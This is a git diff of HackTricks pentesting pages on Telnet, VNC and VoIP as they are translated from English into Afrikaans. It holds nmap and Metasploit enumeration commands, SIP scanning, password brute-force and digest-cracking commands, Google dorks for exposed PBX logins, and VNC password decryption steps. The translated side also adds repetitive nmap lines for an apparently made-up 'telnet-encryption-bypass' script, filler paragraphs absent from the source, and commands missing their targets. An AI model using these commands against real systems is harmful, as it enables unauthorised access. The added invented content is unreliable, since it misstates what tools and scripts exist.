+nmap -p 23 --script telnet-encryption-bypass.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= 
+```
 ```
 Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
 Port_Number:  23     #Comma separated if there is more than one.
 Protocol_Description: Telnet          #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for t=Telnet
-  Note: |
-    wireshark to hear creds being passed
-    tcp.port == 23 and ip.addr != myip
+Name: Notes
+Description: Notes for t=Telnet
+Note: |
+wireshark to hear creds being passed
+tcp.port == 23 and ip.addr != myip
 
-    https://book.hacktricks.xyz/pentesting/pentesting-telnet
+https://book.hacktricks.xyz/pentesting/pentesting-telnet
 
 Entry_2:
-  Name: Banner Grab
-  Description: Grab Telnet Banner
-  Command: nc -vn {IP} 23
+Name: Banner Grab
+Description: Grab Telnet Banner
+Command: nc -vn {IP} 23
 
 Entry_3:
-  Name: Nmap with scripts
-  Description: Run nmap scripts for telnet
-  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}
-  
-Entry_4:
-  Name: consoleless mfs enumeration
-  Description: Telnet enumeration without the need to run msfconsole
-  Note: sourced from https://github.com/carlospolop/legion
-  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
-  
-```
+Name: Nmap with scripts
+Description: Run nmap scripts for telnet
+Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}
 
+Entry_4:
+Name: consoleless mfs enumeration
+Description: Telnet enumeration without the need to run msfconsole
+Note: sourced from https://github.com/carlospolop/legion
+Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
+
+```
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-vnc.md b/network-services-pentesting/pentesting-vnc.md
index 755bf37a9..545f617fc 100644
--- a/network-services-pentesting/pentesting-vnc.md
+++ b/network-services-pentesting/pentesting-vnc.md
@@ -2,58 +2,104 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remote assistance or collaboration over a network.
-
-VNC usually uses ports **5800 or 5801 or 5900 or 5901.**
+**Virtual Network Computing (VNC)** is 'n robuuste grafiese desktop-delingstelsel wat die **Remote Frame Buffer (RFB)**-protokol gebruik om afstandsbeheer en samewerking met 'n ander rekenaar moontlik te maak. Met VNC kan gebruikers naadloos interaksie hê met 'n afgeleë rekenaar deur toetsbord- en muisgebeurtenisse bidireksioneel oor te dra. Dit maak werklike toegang moontlik en fasiliteer doeltreffende afstandsbystand of samewerking oor 'n netwerk.
 
+VNC gebruik gewoonlik poorte **5800 of 5801 of 5900 of 5901.**
 ```
 PORT    STATE SERVICE
 5900/tcp open  vnc
 ```
+## Opname
 
-## Enumeration
+### VNC (Virtual Network Computing)
 
+VNC (Virtual Network Computing) is 'n protokol wat gebruik word vir die beheer van rekenaars oor 'n netwerk. Dit maak dit moontlik vir 'n gebruiker om 'n rekenaar op afstand te bedien en grafiese gebruikerskoppelvlak (GUI) te sien. Hierdie gedeelte sal fokus op die opname van VNC-dienste tydens 'n pentest.
+
+#### TCP-poorte
+
+VNC-dienste gebruik gewoonlik TCP-poorte 5900 tot 5906. Die standaardpoort is 5900, maar dit kan verander word deur die gebruiker of die stelseladministrateur.
+
+#### Opname van VNC-dienste
+
+Om VNC-dienste op te neem, kan jy die volgende stappe volg:
+
+1. Voer 'n TCP-poortskandering uit om VNC-poorte (5900-5906) op die doelstelsel te identifiseer.
+2. Maak 'n verbinding met die geïdentifiseerde VNC-poort om te kyk of dit oop is.
+3. As die poort oop is, probeer om 'n VNC-sessie te begin deur 'n VNC-kliënt te gebruik.
+4. As die VNC-sessie suksesvol gevestig is, kan jy die rekenaar op afstand bedien en die GUI sien.
+
+#### VNC-skandering
+
+Om VNC-dienste te skandeer, kan jy hulpoortskanderingstegnieke gebruik, soos Nmap, om die VNC-poorte op die doelstelsel te identifiseer. Hier is 'n voorbeeld van die gebruik van Nmap om VNC-poorte te skandeer:
+
+```plaintext
+nmap -p 5900-5906 
+```
+
+#### VNC-kliënte
+
+Daar is verskeie VNC-kliënte beskikbaar vir verskillende bedryfstelsels. Hier is 'n paar bekende VNC-kliënte:
+
+- **TightVNC**: 'n Gratis en oopbron VNC-kliënt vir Windows.
+- **RealVNC**: 'n Kommerciële VNC-kliënt vir Windows, Linux en macOS.
+- **UltraVNC**: 'n Gratis VNC-kliënt vir Windows.
+
+#### VNC-veiligheidskwessies
+
+Daar is sekere veiligheidskwessies wat verband hou met VNC-dienste wat jy moet oorweeg tydens 'n pentest:
+
+- **Swak wagwoorde**: Baie VNC-dienste gebruik swak wagwoorde of standaard wagwoorde, soos "admin" of "password". Dit maak dit maklik vir 'n aanvaller om toegang tot die rekenaar te verkry.
+- **Geen versleuteling**: Sommige VNC-dienste stel nie standaard versleuteling in nie, wat beteken dat die verkeer tussen die kliënt en die bediener onversleuteld is. Dit maak dit moontlik vir 'n aanvaller om die verkeer te onderskep en gevoelige inligting te verkry.
+- **Kwesbaarhede**: Daar is sekere kwesbaarhede wat verband hou met spesifieke VNC-implementasies. Dit sluit in bekende kwesbaarhede soos bufferoorloopaanvalle en foutiewe verifikasie.
+
+#### VNC-veiligheidsaanbevelings
+
+Om die veiligheid van VNC-dienste te verbeter, kan jy die volgende aanbevelings oorweeg:
+
+- **Sterk wagwoorde**: Stel sterk en unieke wagwoorde in vir VNC-dienste om te voorkom dat aanvallers maklik toegang tot die rekenaar verkry.
+- **Versleuteling**: Stel versleuteling in vir VNC-dienste om te verseker dat die verkeer tussen die kliënt en die bediener veilig is.
+- **Bywerk van sagteware**: Verseker dat die VNC-sagteware op die bediener en kliënt opgedateer is met die nuutste opdaterings en pleisters om bekende kwesbaarhede te vermy.
+- **Beperkte toegang**: Beperk die toegang tot VNC-dienste deur slegs vertroude IP-adresse toe te laat om te verhoed dat onbevoegde gebruikers toegang verkry.
+
+#### VNC-gebruikersname en wagwoordlekke
+
+As deel van 'n pentest kan jy soek na gelekte VNC-gebruikersname en wagwoorde om te kyk of daar enige kwesbaarhede is. Jy kan verskillende hulpbronne soos gelekte wagwoorddatabasisse en webwerwe vir die soektog gebruik.
 ```bash
 nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p  
 msf> use auxiliary/scanner/vnc/vnc_none_auth
 ```
-
 ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#vnc)
 
-## Connect to vnc using Kali
-
+## Verbind met vnc deur Kali te gebruik
 ```bash
 vncviewer [-passwd passwd.txt] ::5901
 ```
+## Ontsleuteling van VNC-wagwoord
 
-## Decrypting VNC password
-
-Default **password is stored** in: \~/.vnc/passwd
-
-If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
+Standaard wagwoord word gestoor in: \~/.vnc/passwd
 
+As jy die VNC-wagwoord het en dit lyk versleutel ( 'n paar byte, soos of dit 'n versleutelde wagwoord kan wees), is dit waarskynlik versleutel met 3des. Jy kan die wagwoord in duidelike teks kry deur [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd) te gebruik.
 ```bash
 make
 vncpwd 
 ```
-
-You can do this because the password used inside 3des to encrypt the plain-text VNC passwords was reversed years ago.\
-For **Windows** you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
-I save the tool here also for ease of access:
+Jy kan dit doen omdat die wagwoord wat binne 3des gebruik word om die plat-teks VNC-wagwoorde te versleutel, jare gelede omgekeer is.\
+Vir **Windows** kan jy ook hierdie instrument gebruik: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
+Ek stoor die instrument hier ook vir maklike toegang:
 
 {% file src="../.gitbook/assets/vncpwd.zip" %}
 
@@ -63,14 +109,14 @@ I save the tool here also for ease of access:
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-voip/README.md b/network-services-pentesting/pentesting-voip/README.md
index f04bb530c..2aea16f2f 100644
--- a/network-services-pentesting/pentesting-voip/README.md
+++ b/network-services-pentesting/pentesting-voip/README.md
@@ -2,45 +2,44 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## VoIP Basic Information
+## VoIP Basiese Inligting
 
-To start learning about how VoIP works check:
+Om te begin leer oor hoe VoIP werk, kyk na:
 
 {% content-ref url="basic-voip-protocols/" %}
 [basic-voip-protocols](basic-voip-protocols/)
 {% endcontent-ref %}
 
-## VoIP Enumeration
+## VoIP Enumerasie
 
-### Telephone Numbers
+### Telefoonnommers
 
-One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.
+Een van die eerste stappe wat 'n Rooi Span kan doen, is om beskikbare telefoonnommers te soek om met die maatskappy in kontak te tree deur gebruik te maak van OSINT-hulpmiddels, Google-soektogte of die skraping van webbladsye.
 
-Once you have the telephone numbers you could use online services to identify the operator:
+Sodra jy die telefoonnommers het, kan jy aanlyn dienste gebruik om die operateur te identifiseer:
 
 * [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)
 * [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
 * [https://www.whitepages.com/](https://www.whitepages.com/)
 * [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
 
-Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.
+Deur te weet of die operateur VoIP-dienste verskaf, kan jy identifiseer of die maatskappy VoIP gebruik... Verder is dit moontlik dat die maatskappy nie VoIP-dienste ingehuur het nie, maar PSTN-kaarte gebruik om sy eie VoIP PBX met die tradisionele telefoonnetwerk te verbind.
 
-Things such as automated responses of music usually indicates that VoIP is being used.
+Dinge soos outomatiese reaksies van musiek dui gewoonlik daarop dat VoIP gebruik word.
 
 ### Google Dorks
-
 ```bash
 # Grandstream phones
 intitle:"Grandstream Device Configuration" Password
@@ -72,26 +71,22 @@ intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
 # FreePBX
 inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
 ```
+### OSINT-inligting
 
-### OSINT information
+Enige ander OSINT-navorsing wat help om die gebruikte VoIP-sagteware te identifiseer, sal nuttig wees vir 'n Rooi Span.
 
-Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.
-
-### Network Enumeration
-
-* **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not be very accurate with this kind of services.
-* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.
-  * `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.
+### Netwerknavorsing
 
+* **`nmap`** is in staat om UDP-diens te skandeer, maar as gevolg van die hoeveelheid UDP-diens wat gescandeer word, is dit baie stadig en mag dit nie baie akkuraat wees met hierdie tipe dienste nie.
+* **`svmap`** van SIPVicious (`sudo apt install sipvicious`): Sal SIP-dienste in die aangeduide netwerk opspoor.
+* `svmap` is **maklik om te blokkeer** omdat dit die User-Agent `friendly-scanner` gebruik, maar jy kan die kode vanaf `/usr/share/sipvicious/sipvicious` wysig en dit verander.
 ```bash
 # Use --fp to fingerprint the services
 svmap 10.10.0.0/24 -p 5060-5070 [--fp]
 ```
-
-* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
-
+* **`sipscan.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is 'n baie vinnige skander vir SIP-dienste oor UDP, TCP of TLS. Dit maak gebruik van multithreading en kan groot reekse van netwerke skandeer. Dit maak dit maklik om 'n poortreeks aan te dui, beide TCP & UDP te skandeer, 'n ander metode te gebruik (standaard sal dit OPTIONS gebruik) en 'n ander User-Agent te spesifiseer (en meer).
 ```bash
- ./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
+./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
 
 [!] IP/Network: 10.10.0.0/24
 [!] Port range: 5060-5080
@@ -101,85 +96,72 @@ svmap 10.10.0.0/24 -p 5060-5070 [--fp]
 [!] Used threads: 200
 
 ```
-
 * **metasploit**:
 
+Metasploit is 'n kragtige raamwerk vir penetrasietoetse en aanvalle. Dit bied 'n verskeidenheid van gereedskap en hulpbronne vir die uitvoer van verskeie aanvalstegnieke. Metasploit maak gebruik van 'n databasis van bekende swakpunte en maak dit moontlik om vinnig en doeltreffend te soek na en uitbuiting van swakpunte in 'n teikenstelsel. Dit is 'n waardevolle hulpmiddel vir penetrasietoetsers en aanvallers wat hul vaardighede wil verbeter en netwerke wil binnedring.
 ```
 auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
 auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)
 ```
+#### Ekstra Netwerk Enumerasie
 
-#### Extra Network Enumeration
+Die PBX kan ook ander netwerkdienste blootstel, soos:
 
-The PBX could also be exposing other network services such as:
+* **69/UDP (TFTP)**: Firmware-opdaterings
+* **80 (HTTP) / 443 (HTTPS)**: Om die toestel vanaf die web te bestuur
+* **389 (LDAP)**: Alternatief om die gebruikersinligting te stoor
+* **3306 (MySQL)**: MySQL-databasis
+* **5038 (Bestuurder)**: Maak dit moontlik om Asterisk vanaf ander platforms te gebruik
+* **5222 (XMPP)**: Boodskappe met behulp van Jabber
+* **5432 (PostgreSQL)**: PostgreSQL-databasis
+* En ander...
 
-* **69/UDP (TFTP)**: Firmware updates
-* **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web
-* **389 (LDAP)**: Alternative to store the users information
-* **3306 (MySQL**): MySQL database
-* **5038 (Manager)**: Allows to use Asterisk from other platforms
-* **5222 (XMPP)**: Messages using Jabber
-* **5432 (PostgreSQL)**: PostgreSQL database
-* And others...
-
-### Methods Enumeration
-
-It's possible to find **which methods are available** to use in the PBX using `sipenumerate.py` from [**sippts**](https://github.com/Pepelux/sippts)
+### Metodes Enumerasie
 
+Dit is moontlik om **watter metodes beskikbaar is** om in die PBX te gebruik, te vind deur `sipenumerate.py` vanaf [**sippts**](https://github.com/Pepelux/sippts) te gebruik.
 ```bash
 python3 sipenumerate.py -i 10.10.0.10 -r 5080
 ```
+### Uitbreidingsoptelling
 
-### Extension Enumeration
-
-Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
-
-* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.
+Uitbreidings in 'n PBX (Private Branch Exchange) stelsel verwys na die **unieke interne identifiseerders wat toegewys is aan individuele** telefoonlyne, toestelle of gebruikers binne 'n organisasie of besigheid. Uitbreidings maak dit moontlik om oproepe binne die organisasie doeltreffend te **roeteer**, sonder die behoefte aan individuele eksterne telefoonnommers vir elke gebruiker of toestel.
 
+* **`svwar`** van SIPVicious (`sudo apt install sipvicious`): `svwar` is 'n gratis SIP PBX-uitbreidingslyn-skandeerder. In konsep werk dit soortgelyk aan tradisionele wardialers deur 'n reeks uitbreidings of 'n gegewe lys van uitbreidings te **raai**.
 ```bash
 svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
 ```
-
-* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
-
+* **`sipextend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifiseer uitbreidings op 'n SIP-bediener. Sipexten kan groot netwerk- en poortreeks ondersoek.
 ```bash
 python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200
 ```
-
-* **metasploit**: You can also enumerate extensions/usernames with metasploit:
-
+* **metasploit**: Jy kan ook uitbreidings/gebruikersname ondersoek met metasploit:
 ```
 auxiliary/scanner/sip/enumerator_tcp  normal  No     SIP Username Enumerator (TCP)
 auxiliary/scanner/sip/enumerator      normal  No     SIP Username Enumerator (UDP)
 ```
-
-* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
-
+* **`enumiax` (`apt install enumiax`): enumIAX** is 'n Inter Asterisk Exchange-protokol **gebruikersnaam-brute-force enumerator**. enumIAX kan in twee onderskeie modusse werk; Sekwensiële Gebruikersnaam Raaiwerk of Woordelysaanval.
 ```bash
-enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary 
+enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
 enumiax -v -m3 -M3 10.10.0.10
 ```
+## VoIP Aanvalle
 
-## VoIP Attacks
+### Wagwoord Brute-Force
 
-### Password Brute-Force
-
-Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.
+Nadat die **PBX** en sommige **uitbreidings/gebruikersname** ontdek is, kan 'n Rooi Span probeer om **te registreer via die `REGISTER` metode** na 'n uitbreiding deur 'n woordeboek van algemene wagwoorde te gebruik om die outentifikasie te brute force.
 
 {% hint style="danger" %}
-Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...
+Let daarop dat 'n **gebruikersnaam** dieselfde as die uitbreiding kan wees, maar hierdie praktyk kan wissel afhangende van die PBX-stelsel, sy konfigurasie en die voorkeure van die organisasie...
 
-If the username is not the same as the extension, you will need to **figure out the username to brute-force it**.
+As die gebruikersnaam nie dieselfde as die uitbreiding is nie, sal jy die gebruikersnaam moet **uitvind om dit te brute force**.
 {% endhint %}
 
-* **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.
-
+* **`svcrack`** van SIPVicious (`sudo apt install sipvicious`): SVCrack stel jou in staat om die wagwoord vir 'n spesifieke gebruikersnaam/uitbreiding op 'n PBX te kraak.
 ```bash
 svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
 svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
 ```
-
-* **`sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
+* **`sipcrack.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is 'n instrument om die digest-verifikasies binne die SIP-protokol te kraak.
 
 {% code overflow="wrap" %}
 ```bash
@@ -188,132 +170,116 @@ python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyo
 {% endcode %}
 
 * **Metasploit**:
-  * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
-  * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)
+* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
+* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)
 
 ### VoIP Sniffing
 
